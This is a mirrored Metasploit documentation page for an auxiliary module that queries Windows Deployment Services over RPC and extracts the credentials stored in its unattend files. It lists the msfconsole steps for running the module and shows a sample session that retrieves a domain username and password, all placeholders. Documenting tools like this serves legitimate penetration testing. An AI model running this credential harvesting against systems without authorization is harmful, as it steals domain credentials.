CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md
Views: 1904

Vulnerable Application

This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.

More information can be found on the Rapid7 Vulnerability & Exploit Database page and pull request PR #1420.

Verification Steps

  1. Start msfconsole

  2. Do: use modules/auxiliary/scanner/dcerpc/windows_deployment_services

  3. set RHOST [ip]

  4. Do: run

Scenarios

A run on Windows Server 2008 R2 X64

msf > use modules/auxiliary/scanner/dcerpc/windows_deployment_services
msf auxiliary(scanner/dcerpc/windows_deployment_services) > show options
msf auxiliary(scanner/dcerpc/windows_deployment_services) > set RHOST 192.168.5.1
msf auxiliary(scanner/dcerpc/windows_deployment_services) > run

  [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ...
  [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040]
  [*] Sending X64 Client Unattend request ...
  [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt
  [+] Retrieved wds credentials for X64
  [*] Sending X86 Client Unattend request ...
  [*] Sending IA64 Client Unattend request ...

    Windows Deployment Services
    ===========================

    Architecture  Type  Domain        Username  Password
    ------------  ----  ------        --------  --------
    X64           wds   Fabrikam.com  username  my_password

  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed